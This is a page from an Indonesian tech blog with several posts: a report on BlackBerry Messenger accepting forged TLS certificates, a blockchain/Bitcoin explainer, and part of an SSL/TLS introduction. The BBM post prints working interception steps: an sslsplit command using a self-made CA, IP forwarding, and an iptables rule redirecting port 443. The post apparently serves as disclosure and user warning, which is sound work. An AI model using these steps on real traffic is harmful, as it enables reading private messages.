Pengenalan dan Penjelasan yang berusaha biarpun gagal tapi lumayan komprehensif tentang IPv6, dari sejarah sampai pengalamatannya ditulis dengan Layman’s terms

Belajar Jaringan Komputer Dasar - Layer OSI 1, 2, dan 3
Teori yang harus diketahui oleh setiap network engineer. Layer OSI 1, 2, dan 3, frame Ethernet dan paket IP, serta proses routing paket IP.

Refs:

[1] RFC 5375 - Considerations for /64 Prefixes https://tools.ietf.org/html/rfc5375#section-3.1
[2] RFC 6164 - Using 127-Bit IPv6 Prefixes on Inter-Router Links https://tools.ietf.org/html/rfc6164
[3] RFC 3849 - IPv6 Address Prefix Reserved for Documentation https://www.ietf.org/rfc/rfc3849

BlackBerry Messenger Rentan Mitm Attack

2017-01-12T13:19:00+08:00

Awalnya dari saya baca-baca tentang HSTS (HTTP Strict Transport Security). HSTS ini metode buat mencegah Man-in-the-middle (MitM) attack di komunikasi secure SSL/TLS.

Salah satu cara attack komunikasi SSL/TLS sebelum adanya HSTS ini biasanya pakai protocol downgrade. Caranya, si attacker secara diam-diam menempatkan diri di tengah-tengah komunikasi SSL antara client sama server, terus dia meng-interupsi komunikasi antara client ke server.
Di sini attacker bisa downgrade komunikasi client ke server yang awalnya secure pakai SSL didowngrade ke plain HTTP. Kalau user kurang teliti bisa tanpa sadar masuk jebakan ini karena tidak ada warning apa-apa di browser.

HSTS fungsinya mencegah tipe MitM ini. Caranya, server menginformasikan ke client bahwa komunikasi ke server ini harus pakai SSL/TLS. Jadinya kalau protokol di-downgrade ke plain HTTP koneksi bakal di terminate dan client menolak berkomunikasi sama server pakai plain HTTP.

Kelemahannya, koneksi yang pertama kali ke server yang belum pernah diakses tetap tidak terproteksi jadi tetap ada kemungkinan protokol downgrade di sini. Karena itu client serperti browser Firefox atau Chrome sudah dimasukkan list situs-situs yang dikenal pakai HSTS supaya koneksi ke situs-situs ini biarpun pertama kalinya tetap terproteksi.

Begitu HSTS ini mulai diaplikasikan, metode attack SSL/TLS downgrade jadi tidak bisa lagi dipakai di server yang ada HSTS nya.

Karena itu tes HSTS saya coba eavesdropping komunikasi bukan dengan cara downgrade SSL tapi pakai cara redirect komunikasi secure nya. Pakai cara ini komunikasi client tetap pakai SSL/TLS cuma CA atau Certificate Authority dipalsukan pakai CA buatan sendiri.

Ini gambaran bagaimana gambaran MitM komunikasi SSL/TLS.

Tool yang saya pakai namanya SSLsplit. Metodenya, attacker ada di tengah-tengah komunikasi fungsinya jadi client sekaligus server. Jadi client buat ambil data dari server yang sebenarnya, jadi server buat meneruskan data ke client yang sebenarnya.

Pas client kirim message client hello waktu SSL handshake, attacker juga kirim client hello ke server. Berikutnya, server kirim server hello sama certificate. Attacker ambil informasi dari digital certificate ini, terus dia buat certificate signing request yang informasinya sama seperti yang asli, Subject DN, Common Name, dll semuanya disamakan. CSR yang sudah digenerate ini terus di-sign pakai CA buatan sendiri dan jadilah digital certificate yang sama dengan certificate aslinya.

Certificate buatan ini terus dikirim ke client. Client coba verifikasi validitas certificate ini dan normalnya, kalau client itu bagus dia langsung terminate komunikasi karena CA yang menandatangani certificate itu tidak ada di trusted database. Client modern semacam Firefox atau Google Chrome pasti muncul warning karena certificate tidak trusted.

Nah pas waktu tes malah saya secara tidak sengaja temukan BlackBerry Messenger atau BBM dia vulnerable sama attack jenis MitM, tepatnya SSL Man-in-the-middle attack.

Problemnya, client BBM dia tidak ada warning yang muncul, komunikasi juga tidak di-stop biarpun certificate dipalsukan, chatting tetap bisa jalan. Parahnya lagi, BBM bukan seperti WhatsApp atau Telegram yang pakai end-to-end encryption, jadi ya pesan chatting bisa dibaca.

Ini hasil percobaan saya:

Pertama, client BBM sudah yang paling baru dari Google Play Store.

Saya pakai port 8443 dan jalankan SSLsplit mode debug.

sslsplit -D \
-S /home/dhani/void/ \
-c /home/dhani/vpn/keys/ca.crt \
-k /home/dhani/vpn/keys/ca.key \
https 0.0.0.0 8443

-D: Debug.
-S: Directory tempat log. Log komunikasi ditulis di direktori ini.
-c: CA certificate
-k: CA key
https 0.0.0.0 8443: Buat socket dan bind semua ip address di tcp port 8443. https berasumsi bahwa ini komunikasi http dan SSLsplit secara otomatis bisa men-decode log ke http. Selain https bisa pakai ssl sama tcp.

Generated RSA key for leaf certs.
SSLsplit 0.5.0 (built 2017-01-10)
Copyright (c) 2009-2016, Daniel Roethlisberger <daniel@roe.ch>
http://www.roe.ch/SSLsplit
Build info: V:GIT
Features: -DHAVE_NETFILTER
NAT engines: netfilter* tproxy
netfilter: IP_TRANSPARENT SOL_IPV6 !IPV6_ORIGINAL_DST
Local process info support: no
compiled against OpenSSL 1.0.1t  3 May 2016 (1000114f)
rtlinked against OpenSSL 1.0.1t  3 May 2016 (1000114f)
OpenSSL has support for TLS extensions
TLS Server Name Indication (SNI) supported
OpenSSL is thread-safe with THREADID
Using SSL_MODE_RELEASE_BUFFERS
SSL/TLS protocol availability: ssl3 tls10 tls11 tls12 
SSL/TLS algorithm availability: RSA DSA ECDSA DH ECDH EC
OpenSSL option availability: SSL_OP_NO_COMPRESSION SSL_OP_NO_TICKET SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION SSL_OP_TLS_ROLLBACK_BUG
compiled against libevent 2.0.21-stable
rtlinked against libevent 2.0.21-stable
4 CPU cores detected
SSL/TLS protocol: negotiate
proxyspecs:
- [0.0.0.0]:8443 ssl|http netfilter
Loaded CA: '/C=ID/ST=Kalimantan Timur/L=Balikpapan/O=DevNull/OU=DevNull/CN=DevNull Authority/name=ca/emailAddress=dhani.stx@gmail.com'
Created self-pipe [r=3,w=4]
Created chld-pipe [r=5,w=6]
Created socketpair 0 [p=7,c=8]
Created socketpair 1 [p=9,c=10]
Created socketpair 2 [p=11,c=12]
Using libevent backend 'epoll'
Event base supports: edge yes, O(1) yes, anyfd no
Received privsep req type 03 sz 9 on srvsock 7
Received privsep req type 00 sz 1 on srvsock 7
Inserted events:
Received privsep req type 00 sz 1 on srvsock 11
  0x1f6af50 [fd 6] Read Persist
  0x1f6b470 [fd 7] Read Persist
  0x1f6ad88 [fd 5] Read Persist
  0x1f65140 [fd 3] Signal Persist
  0x1f6b6b0 [fd 1] Signal Persist
  0x1f6b7e0 [fd 2] Signal Persist
  0x1f6b910 [fd 13] Signal Persist
  0x1f6bae0 [fd 10] Signal Persist
Initialized 8 connection handling threads
Started 8 connection handling threads
Starting main event loop.

Di output line Loaded CA itu informasi CA yang saya pakai.

Selanjutnya, parameter kernel untuk routing perlu diaktifkan sama nat tcp port 443 ke port 8443

echo 1 >/proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8443

Masalah bagaimana traffic packet IP bisa masuk ke interface dan di-capture tidak saya bahas karena tujuan tulisan ini buat informasi ke user BBM sekligus pembuktian kalau BBM bisa disadap, bukan bagaimana cara attack MitM.

Nah waktu buka BBM, di output debug SSLsplit ada informasi certificate yang original sama yang buatan seperti ini.

===> Original server certificate:
Subject DN: /C=CA/ST=Ontario/L=Waterloo/O=BlackBerry Ltd/OU=IT/CN=*.bbm.blackberry.com
Common Names: *.bbm.blackberry.com/*.bbm.blackberry.com
Fingerprint: 23:25:C7:DA:28:27:F9:54:AE:09D8:AD:C3:C9:9C:61:B5:3F:09:95
Certificate cache: HIT
===> Forged server certificate:
Subject DN: /C=CA/ST=Ontario/L=Waterloo/O=BlackBerry Ltd/OU=IT/CN=*.bbm.blackberry.com
Common Names: *.bbm.blackberry.com/*.bbm.blackberry.com
Fingerprint: E6:C8:E4:AB:EC:C3:2D:43:EA:D035:2C:30:98:E0:E6:9C:DC:26:81

Semuanya sama kecuali signature, atau fingerprint.

Saya tidak tau apa BBM ini verifikasi CA sama certificate fingerprint atau tidak, yang jelas komunikasi tidak ada interupsi.

Ini tes chatting BBM

Dan ini log SSLsplit.

Problem ini, saya sudah kirim email ke support BlackBerry, semoga saja mereka perbaiki.
Saran saya sebelum vulnerability ini hilang, sebaiknya tidak kirim informasi sensitif lewat BBM. Lewat WhatsApp atau Telegram saja yang lebih secure.

Saya tidak tau apa lembaga semacam ID-SIRTII atau ID-CERT mereka juga lihat isi IP payload atau tidak, kalau iya kan berarti mereka bisa baca chatting pengguna BBM di Indonesia.

Wheeww..!!

Artikel berkaitan:
Tentang SSL/TLS + sertifikat TLS gratis dari Let’s Encrypt
Pembahasan yang lumayan komprehensif tentang Public Key Infrastructure atau PKI

Blockchain: Teknologi dibalik Bitcoin

2017-01-07T22:19:00+08:00

Gambar: pinterest.com

Bayangkan sebuah sistem tanpa otoritas. Bayangkan kalau kita bisa transaksi tanpa perlu bank, atau buat kontrak tanpa perlu notaris. Bayangkan kalau ada sistem yang bisa mengganti fungsi pihak ketiga itu, bank atau notaris itu, tanpa ribet dan tanpa mahal.

Bisakah? Mungkin sekarang belum, tapi nanti bisa sangat mungkin. Teknologi atau sistem itu sekarang lagi populer, namanya blockchain, teknologi dibalik kesuksesan cryptocurrency Bitcoin.

Bitcoin ini kurang lebih sama seperti mata uang umunya seperti Rupiah atau Euro, bedanya Bitcoin bentuknya digital. Bedanya lagi, kalau Euro dipakai di negara-negara Eropa atau Rupiah dipakai di Indonesia, Bitcoin dipakai di negara Internet. Perbedaan lainnya, tidak ada otoritas seperti bank yang mengelola Bitcoin. Proses otorisasi, autentikasi, dan verifikasi semuanya ada di sistem blockchain.

Sebelum terlalu jauh tulisannya, buat teman-teman yang mendarat di halaman ini karena pengen tau apa itu Bitcoin, siapa Satoshi Nakamoto, cara transaksi Bitcoin, atau cari tau tentang jual beli Bitcoin, tulisan ini bukan tentang itu, tapi lebih ke masalah teknologinya.

Jadi seperti apa blockchain itu?
Blockchain itu database. Dalam konteks Bitcoin, database ini isinya record transaksi siapa kirim berapa bitcoin ke siapa. Yang bikin beda sama database umumnya, blockchain ini sistemnya ter-desentralisasi, terbuka, read only, read only artinya begitu transaksi sudah tercatat, record itu tidak bisa lagi dirubah. Sebenarnya bukan tidak bisa dirubah, tapi hampir mustahil ada orang bisa memanipulasi data yang tercatat.

Blockchain ini database yang data-datanya ditempatkan di blok-blok. Satu block itu isinya banyak record transaksi. Block-block ini tersusun berdasarkan urutan waktu terus masing-masing block ini punya link ke block sebelumnya, link ini bentuknya hash sha256.

Biar bisa paham cara kerja blockchain, kita harus paham dulu pengetahuan dasar tentang Public Key Encryption. Jadi kalau ada di antara teman-teman yang belum paham apa itu Digital Signature, Public Key Infrastructure sama algoritma hash, sebaiknya pelajari dulu. Beberapa waktu lalu saya ada publish post tentang SSL/TLS. Memang tentang SSL/TLS tapi di dalamnya ada pembahasan yang lumayan komprehensif tentang PKI (Public Key Infrastructure), judulnya Tentang SSL/TLS + sertifikat TLS gratis dari Let’s Encrypt

Lanjut, ambil contoh transaksi bitcoin. Alice minum kopi di warung kopi punya Bob, warkopnya Bob ini terima pembayaran Bitcoin. Alice, yang juga punya Bitcoin coba bayar kopi pakai Bitcoin, harganya kalau dalam Rupiah 15 ribu tapi dikonversi ke Bitcoin sekitar 0.001 BTC. Alice buka aplikasi Bitcoin di hapenya, terus transfer 0.001 BTC ke alamat bitcoin Bob.

Supaya bisa transaksi pakai Bitcoin, Alice sama Bob sebelumnya harus punya bitcoin wallet, kita bisa analogikan bitcoin wallet ini seperti rekening bank. Kalau rekening bank ada identitasnya, bitcoin wallet juga ada tapi identitas bitcoin wallet ini bukan nama seperti rekening tapi key pair enkripsi asimetris, ada public key sama private key. Terus yang pasti, kalau mau bisa transaksi Bitcoin, di bitcoin wallet itu harus ada nilai bitcoin atau semacam saldo kalau di rekening. Bitcoin ini bisa dibeli di market pakai mata uang tradisional seperti Rupiah. Alice di walletnya sudah punya bitcoin 0.5 BTC yang sebelumnya dia beli dari local market seharga 6 juta.

Alamat bitcoin contohnya seperti 3HCSJQA3zji58dJmifL5q1DA7p2hX5rGAZ yang bisa dibuat gratis di banyak provider bitcoin wallet, salah satunya seperti Coinbase. Itu alamat bitcoin yang valid, kalau mau coba silahkan transfer bitcoin, itu alamat Bitcoin saya :)
Panjang alamat bitcoin ini sepanjang 20 byte atau 160 bit yang berarti 2¹⁶⁰.

    2 ^ 160 = 1461501637330000000000000000000000000000000000000

Kalau alamat bitcoin sebanyak itu, alamat bitcoin ini tidak bakal habis biarpun masing-masing penduduk bumi punya sejuta alamat bitcoin yang berbeda.

Terus dibalik bitcoin ini ada jaringan yang disebut bitcoin network, network ini yang ngatur semua transaksi bitcoin. Jaringan atau bitcoin network ini isinya komputer, sebutannya node. Node ini diinstal software Bitcoin terus mereka ini terhubung satu sama lainnya, node-node ini bisa komputer seperti PC umumnya atau komputer yang didesain khusus buat jalankan software Bitcoin.
Network ini sistemnya peer to peer yang artinya tidak ada servernya, masing-masing node saling terkoneksi seperti aplikasi Bittorrent.

Apa yang terjadi waktu Alice transfer bitcoin ke alamat bitcoin Bob? Prosesnya, aplikasi wallet Alice buat dua request transfer seperti ini:

Transfer 0.001 BTC dari wallet Alice ke wallet Bob.
Transfer 0.498 BTC dari wallet Alice ke wallet Alice.

Dari sisi pengguna, Alice cuma tau kalau saldonya berkurang. Tapi dari sisi network bitcoin transfer itu ada dua, satu transfer ke alamat Bitcoin Bob, satunya ke alamat Alice sendiri.
Jadi di Bitcoin itu tidak ada namanya saldo, yang ada input sama output. Yang dianggap saldo itu cuma input yang belum jadi output. Input itu bitcoin yang masuk, output bitcoin yang keluar dari wallet. Terus input sama output ini harus balance, bitcoin yang masuk sama yang keluar harus imbang.

Nah di contoh ini, input wallet Alice yang 0.5 BTC dari market. Nah waktu transaksi, input 0.5 BTC ini harus habis jadi output semua. Karena itu dibuat dua output seperti di atas itu, output pertama bayar kopi, output kedua transfer ke wallet sendiri.
Tapi kalau diperhatikan 0.001 + 0.0498 = 0.499 bukan 0.5, kemana yang 0.001? 0.001 BTC ini jadi fee buat network atas jasa mereka memproses transaksi itu. Jadi fee network itu selisih dari transaksi, kalau misalnya Alice di output kedua transfer 0.497 BTC ke wallet sendiri, berarti fee buat network jumlahnya 0.002 BTC.

Jadi, request wallet Alice ke network kurang lebih seperti ini:

Halo, saya Alice. Saya punya input 0.5 BTC yang mau dijadikan output.
Output 1, 0.001 BTC ke wallet Bob.
Output 2, 0.498 BTC ke wallet sendiri.
Sisanya yang 0.001 BTC silahkan diambil buat fee.

Fee ini sifatnya opsional, artinya tanpa fee pun transaksi tetap diproses sama network. Cuma fee ini bisa menentukan prioritas, semakin besar fee semakin cepat diproses.

Request Alice di atas itu kemudian ditandatangani secara digital pakai private key Alice terus di-broadcast ke network. Para node di network yang terima pesan broadcast itu mereka coba verifikasi, apa benar Alice yang kirim pesan itu. Verifikasi ini pakai public key Alice, kalau tandatangan atau digital signature yang di-broadcast cocok dengan public key Alice berarti request itu valid.

Begitu transaksi itu valid dan berhasil diverifikasi, request itu diproses, record transaksi itu dicatat terus dimasukkan ke block bersama record banyak transaksi lainnya. Block ini kemudian ditempatkan ke database blockchain sebagai block baru.

Struktur block.

Seperti apa bentuknya block itu?

Struktur block kurang lebih seperti di bawah:

4 byte : block size. Berisi informasi berapa besar block ini.
80 byte : header block.
1-9 byte : berisi informasi berapa transaksi yang ada di block ini.
bervariasi : berisi list transaksi bitcoin yang tercatat di block ini.

Rincian header block yang 80 byte di atas seperti ini:

4 byte : versi software bitcoin yang dipakai.
32 byte : berisi hash block sebelumnya.
32 byte : hash dari merkle root atau root data structure binary hash tree.
4 byte : berisi timestamp kapan waktu block ini dibuat. Hitungan detik dari Unix Epoch (1 Januari 1970).
4 byte : tingkat kesulitan algoritma proof-of-work.
4 byte : nonce. Atau nilai proof-of-work yang berhasil ditemukan.

Merkle root, Nonce sama proof-of-work dibahas nanti.

Seperti terlihat, setiap block di headernya ada hash dari block sebelumnya atau bisa dianggap link ke block sebelumnya. Begitu terus dan kalau link ini ditelusuri terus, ujungnya ada di block yang paling pertama dibuat. Block yang paling pertama dibuat ini namanya Genesis Block yang dibuat di tahun 2009. Baca lebih lanjut tentang Genesis Block.

Merkle root. Data structure-nya namanya merkle tree atau binary hash tree. Skip.. skip.. tanpa terlalu detail, adanya hash dari merkle root ini dipakai buat membuktikan dengan cepat apakah di block ini transaksi yang dicari ada atau tidak. Satu block, isinya bisa 500 sampai diatas seribu transaksi bitcoin, kalau cari satu-satu diurut dari awal sampai transaksi terakhir tidak efektif, nah adanya root hash ini bisa dipakai buat pembuktian bahwa transaksi yang dicari ada di dalam block tanpa perlu lihat record satu per satu. Wikipedia tentang data structure Merkle tree

Kembali ke Network. Salah satu jenis node di Network ini ada yang kerjanya mem-validasi, verifikasi transaksi, terus kalau transaksi itu valid, mereka catat transaksi itu dalam block, node ini namanya Miner. Ada banyak Miner di network bitcoin, ribuan atau mungkin jutaan miner yang saling terkoneksi satu sama lain.

Terus network blockchain ini tidak ter-sentralisasi, artinya tidak ada server yang terpusat. Database blockchain itu tersebar di semua node, masing-masing node punya database yang sama yang saling singkron terus menerus.

Waktu ada pesan broadcast dari Alice, database blockchain pada waktu itu sampai block ke 99 misalnya. Berarti para miner waktu itu semuanya kerja secara independen buat block berikutnya, block ke 100 yang transaksi kopi Alice bakal masuk di block ini.

Di sini muncul problem. Karena masing-masing miner memproses block berikutnya, block ke 100 secara independen, block ini bisa beda-beda isinya antara miner satu sama yang lainnya. Bahkan mungkin ada node miner yang lokasinya jauh dari Alice dia tidak terima pesan broadcast-nya karena misalnya latency jaringan Internetnya tinggi, jadi di miner ini transaksi Alice tidak masuk di block ke 100, tapi di miner lain ada.

Solusinya, ada semacam tantangan buat para miner ini, siapa yang berhasil menang lomba ini, dia yang berhak menempatkan block ke 100 ke chain database blockchain. Bukan cuma itu, miner ini juga dapat reward atau imbalan bitcoin atas hasil usahanya. Selain reward, miner ini juga punya hak ambil fee dari setiap transaksi termasuk fee 0.001 BTC dari Alice, ditambah banyak fee dari ratusan bahkan ribuan transaksi yang masuk di block ke 100.

Tantangan ini yang di blockchain dinamai Proof-of-work. Para miner ini beradu cepat menebak angka yang disebut angka nonce. Siapa berhasil menemukan nonce paling cepat dia pemenangnya.

Bitcoin mining

Reward bitcoin buat miner yang berhasil menang ini satu-satunya cara pembuatan Bitcoin baru. Jadi bitcoin yang beredar sekarang ini awalnya dari para miner itu, karena itu mereka disebut miner atau penambang Bitcoin.
Berapa banyak coin yang didapat miner kalau berhasil menebak nonce? banyak.

Reward buat miner itu 50 BTC. Tapi jumlah ini dikurangi setenganya setiap 210.000 block baru. Setiap kurang lebih 10 menit muncul block baru di blockchain, ini berarti sekitar 4 tahun sekali reward dipotong setengah. Genesis block atau block yang paling pertama dibuat di tahun 2009, reward buat miner 50 BTC. Tahun 2012 jadi setengahnya, 25 BTC dan di tahun 2016 dipotong lagi setengah jadi 12.5 BTC. Jadi sekarang ini reward buat miner yang berhasil menebak nonce reward-nya 12.5 BTC.

Reward ini bakalan dipotong setengahnya terus sampai total bitcoin yang beredar totalnya 21 juta bitcoin. Ini batasan Bitcoin, kalau sudah sampai 21 juta bitcoin tidak ada lagi bitcoin yang bisa dibuat. Reward buat para miner setelah ini cuma dari fee transaksi saja

Proof-of-work

Proof-of-work ini data yang jadi syarat supaya block bisa dimasukkan ke blockchain. Data Proof-of-work ini susah sekali buatnya, perlu waktu sama computing power yang besar, tapi gampang buat diverifikasi kebenarannya. Proses pembuatan data ini caranya acak dan tebak-tebakan, terus probabilitas tebakan itu benar kemungkinannya kecil sekali.

Caranya, para miner harus mencari nilai hash SHA256 yang inputnya header block + nilai nonce yang hasil hash ini nilainya sama dengan atau lebih kecil dari target.

   hash (header block + nonce) <= target

Nonce ini panjangnya 4 byte atau 32 bit. Para miner, mereka cari nilai nonce ini, nonce berubah maka hash yang dihasilkan berubah. Mereka tebak nonce terus menerus sampai hasil hash sama atau lebih kecil dari target. Tingkat kesulitannya ada di target ini, kalau target nilainya besar berarti kemungkinan hasil hash lebih kecil dari target juga besar. Tapi kalau nilai target ini kecil, probabilitas menemukan nonce yang tepat juga jadi kecil.
Tingkat kesulitan ini namanya Difficulty dan ini disesuaikan terus menerus. Kalau para miner bisa gampang nebak nonce, maka difficulty dinaikkan yang berarti nilai target turun. Difficulty ini dipakai buat menjaga supaya rata-rata Proof-of-work itu bisa dihasilkan setiap 10 menit sekali, yang berarti block baru masuk ke database blockchain setiap sekitar 10 menit.

Evolusi hardware miner
Dulu, awal-awal bitcoin para miner biasa pakai PC biasa yang diinstall software Bitcoin Core terus dijadikan node miner. Kemudian muncul tren pakai GPU atau Graphical Processing Unit buat dijadikan miner. GPU lebih cepat dari CPU biasa, jadi bisa lebih banyak menebak hash per detiknya dibandingkan CPU.

Karena Bitcoin yang tambah lama tambah populer ditambah kompetitifnya persaingan mining, para produsen hardware mereka produksi Field-programmable gate array atau FPGA card buat hardware mining yang tentu saja lebih cepat dibanding GPU. Persaingan tambah sengit, sekarang ini tren mining sudah jadi hardware ASIC (Application Specific Integrated Circuit) yang punya power sekian ratus ribu mega hash per detiknya, jauh kalau dibandingkan sama FPGA yang punya power rata-rata dibawah seribu mega hash per detiknya.

Tentu saja para miner yang awal-awal pakai ASIC bisa kaya mendadak, tapi karena sekarang rata-rata miner semuanya ASIC jadinya ya tetap kompetitif. Dan saking ketatnya persaingan hardware mining ini, sekarang mining biarpun pakai hardware ASIC yang mahal pun tetap susah bersaing. Karena itu rata-rata para miner sekarang mereka buat grup miner yang disebut mining pool, pool ini isinya banyak hardware mining yang ngumpul jadi satu terus beban kerja nebak hash dibagi ke anggota pool itu. Kalau pool ini berhasil menghasilkan Proof-of-work, reward bitcoinnya dibagi ke anggota pool berdasarkan kontribusi hardware miner itu.

Karena kemampuan hardware yang tambah hari tambah cepat ini makanya difficulty proof-of-work mengikuti tren ini biar pembuatan block baru bisa tetap di rata-rata sepuluh menit.

Miner yang berhasil menemukan nilai nonce, dia kirim pesan broadcast ke network. Node lain yang terima pesan broadcast ini coba verifikasi apa benar nonce ini menghasilkan data proof-of-work dibawah nilai target. Kalau benar, para node ini mereka ambil block yang dibuat penemu nonce terus block ini dimasukkan ke database blockchain mereka. Mereka para miner ini kemudian mulai lagi kerja nebak nonce buat block berikutnya, begitu seterusnya.

Fork

Biarpun kemungkinannya kecil sekali tapi bisa terjadi di waktu yang hampir bersamaan dua node miner atau lebih mereka berhasil menemukan nonce. Ini bisa muncul kalau pesan broadcast penemu nonce pertama belum sampai ke node kedua, bisa jadi karena jarak atau latency jaringan.
Kalau begini, ada dua block baru yang sama-sama valid dimasukkan ke database blockchain, problem ini disebut fork.

karena problem fork ini, network jadi terbagi.

Fork ini tidak boleh dibiarkan, network harus memilih salah satu dari dua block yang sama-sama valid itu. Caranya, para miner harus memprioritaskan salah satu dari dua block, terserah yang mana. Begitu salah satu dari dua block ini dapat block baru, maka block ini yang diambil. Gampangnya, cabang mana yang paling panjang rentetan block-nya, dia yang diambil.

Security

Blockchain ini sistemnya open, semua transaksi bisa dilihat siapa saja yang punya Internet, software-nya pun Open Source. Bagaimana keamanan datanya?

Ada beberapa tipe penggunaan database blockchain yang tidak legal.
Pertama Unauthorized transaction. Setiap akun bitcoin wallet diproteksi pakai sepasang asymetric encryption key. Artinya bitcoin yang tercatat di wallet itu cuma yang punya private key yang bisa transaksi, orang tidak bisa seenaknya pakai bitcoin orang lain buat transaksi karena kalau digital signature mismatch pasti ditolak sama network. Kecuali akun bitcoin wallet jatuh ke orang lain ini lain ceritanya, weak link nya ada di user bukan di sistem.

Kedua alter data. Bagaimana kalau ada attacker yang coba merubah data yang tercatat di blockchain?

Misal attacker merubah transaksi yang ada di block 96. Karena transaksi berubah, maka data merkle root di header juga berubah yang berarti hash header juga berubah yang juga berarti Proof-of-work sama nonce jadi invalid. Kalau begini, attacker harus cari nilai nonce sampai benar. Kalau para miner saja harus join pool buat cari proof-of-work, bayangkan bagaimana lamanya attacker yang sendirian itu menebak nonce.

Oke kalau dianggap attacker ini punya hardware yang sangat super cepat yang bisa menebak nonce dalam hitungan menit, dia masih punya tugas lagi. Hash 96 punya attacker ini valid tapi karena data berubah maka hash pun berubah, dan karena setiap block punya link hash ke block sebelumnya, maka block 96 dan 97 jadi terputus karena hash block 96 yang tercatat di block 97 tidak sama lagi.

Dengan kondisi begini, attacker mau tidak mau dia harus rubah block 97 juga. Dia harus rubah hash block sebelumnya di block 97 supaya sama dengan hash block 96, akibatnya header block 97 berubah. Kalau header berubah berarti proof-of-work jadinya tidak valid lagi. Artinya, tebak nonce lagi. Ketemu nonce block 97, dia masih punya block 98, 99, sama block 100 yang harus dimodifikasi juga.

Kalaupun attacker ini berhasil, biarpun kemungkinan itu hampir mustahil, dia harus ingat bahwa blockchain ini databasenya tersebar di semua node yang terkoneksi ke network. Artinya, attacker ini harus merubah database di semua node itu, bayangkan bagaimana susahnya itu.

Ketiga double spending. Double spending ini, input bitcoin yang sama dipakai di dua ouput transaksi yang berbeda di waktu yang hampir bersamaan. Node yang terima pesan transaksi ini cuma bisa terima satu transaksi saja, transaksi yang lain dianggap tidak valid. Masalahnya tidak semua node bisa sepakat transaksi mana yang valid sama mana yang tidak. Kalau kondisi network normal, double spend ini tidak terlalu jadi masalah karena begitu proof-of-work berhasil dibuat, data di block miner penemu nonce itu yang valid. Karena itu, double spend ini kalau mau berhasil, maka network harus terpecah dan satu-satunya waktu network tidak sepakat itu waktu ada problem fork.

Kembali ke fork lagi, fork ini kan cuma bisa muncul kalau ada dua atau lebih miner yang menemukan nonce secara bersamaan. Nah si attacker harus pikirkan bagaimana caranya itu bisa terjadi terus terusan, karena kalau salah satu cabang fork lebih panjang, cabang yang satunya jadi tidak valid lagi.

Sampai sini kita bisa ambil kesimpulan bahwa semakin lama umur block maka semakin solid. Karena itu biasanya kalau transaksi bitcoin yang jumlahnya besar, transaksi ditunggu sampai sekitar satu jam biar block tempat transaksi itu ditumpuk 6 block di depannya. 6 Block atau 6 konfirmasi ini disepakati jadi batas aman block tidak bisa lagi dimanipulasi.

Blockchain vulnerablity

Kalau dilihat dari masalah keamanan di atas bisa disimpulkan bahwa keamanan data blockchain ini ada di kerumitan komputasi sama race melawan network miner. Tapi ada cara yang memudahkan attack di atas itu, namanya 51% attack. 51% attack ini kalau attacker bisa menguasai 51% network miner, maka dia bisa mengontrol network karena kemungkinan menemukan proof-of-work jadi lebih besar kalau sebagian besar network miner dikuasai. Tapi biarpun begitu, cuma alter data sama double spend saja yang mungkin bisa curangi, masalah unauthorized transaction tetap aman karena diproteksi pakai digital signature.

Conclusion

Teknologi blockchain ini memang masih belum diadopsi luas, tapi adanya Bitcoin ini blockchain jadi populer.

Bayangkan kemungkinan-kemungkinan apa saja nanti yang bisa muncul karena blockchain. Mungkin kita tidak perlu ICANN buat mengatur nama domain lagi. Mungkin sistem DNS kita tidak lagi diatur sama root server yang 13 itu. Mungkin masalah legal yang selama ini bergantung sama notaris bisa dialihkan ke blockchain.

Kalau saya bayangkan bagaimana kalau semua masyarakat Indonesia masing-masing punya identitas digital yang diproteksi pakai encryption key. Terus kalau ada voting semacam pemilu atau pikada, identitas digital dipakai buat voting terus hasil voting ditempatkan di database blockchain. Voting bisa lewat smartphone atau komputer yang tersambung ke Internet. Tidak ada pilihan yang tidak valid karena semua pilihan ditandatangani pakai digital signature. Tidak ada yang bisa memanipulasi data karena data ada di database blockchain, bukan di KPU.

Itu imajinasi Saya, rekans Linuxer mungkin saja imajinasinya lebih liar lagi dari itu :)

Refs:
Sumber diambil dari e-book Mastering Bitcoin yang ditulis oleh Andreas M. Antonopoulos.

Tentang SSL/TLS + sertifikat TLS gratis dari Let's Encrypt

2016-12-19T14:35:00+08:00

Kalau teman-teman lihat di address bar blog ini, protokolnya pakai https yang berarti koneksi ke blog ini pakai secure connection.
Atau coba cek pakai command

openssl s_client -connect devnull.web.id:443

Aman tidak harus mahal. Sertifikat ssl yang dipakai blog ini gratis dari Let’s Encrypt. Beda sama sertifikat gratis lainnya yang mensyaratkan harus langganan hosting di provider tertentu, Let’s Encrypt tidak, kita cuma perlu membuktikan kalau kita owner website tersebut.

Sebelum ke free certificate dari Let’s Encrypt, kita pelajari dulu apa itu Public Key Infrastructure (PKI) dan SSL/TLS. Buat teman-teman pembaca yang mau langsung lompat ke cara install sertifikat, silahkan langsung ke bagian Let’s Encrypt.

Pentingkah security?
Kalau mau jawab pertanyaan ini, kita bisa bayangkan jaringan Internet itu seperti komunikasi yang sifatnya terbuka. Bayangkan kita bicara satu lawan satu tapi di tengah-tengah kerumunan banyak orang, mereka bisa dengar apa yang kita bicarakan.
Kalau di jaringan, komunikasi satu lawan satu ini disebut unicast, beda sama broadcast yang komunikasinya satu ke banyak. Jenis-jenis komunikasi ini ada saya bahas sedikit di artikel tentang IPv6, “Hampir” Semua Tentang IPv6.

Tapi ceritanya jadi lain kalau pembicaraan ini sifatnya harus privat, yang tidak boleh ada yang tahu kecuali dua pihak unicast itu. Dan di era Internet sekarang ini ada yang namanya e-commerce, Internet banking, dan lainnya yang sifat komunikasinya harus aman.

Internet kita ini berjalan di atas protokol IP dan routing yang ada di layer 3 OSI. Routing artinya untuk bisa berkomunikasi secara unicast, kita tidak bisa langsung bicara ke pihak yang dituju. Pesan kita itu dirouting seperti kalau kirim paket lewat jasa ekspedisi, pesan kita itu diserahkan secara estafet dari hop ke hop sampai ke tujuan.

Masalahnya adalah, di setiap hop itu siapapun yang berwenang bisa melihat isi pesan kita, bahkan bukan tidak mungkin mereka bisa merubah isinya. Siapa mereka itu? Mereka itu adalah provider Internet kita, Telkom, Indosat, dll. saya juga bekerja di provider Internet dan paham sekali yang seperti ini, jadi jangan percaya mereka.

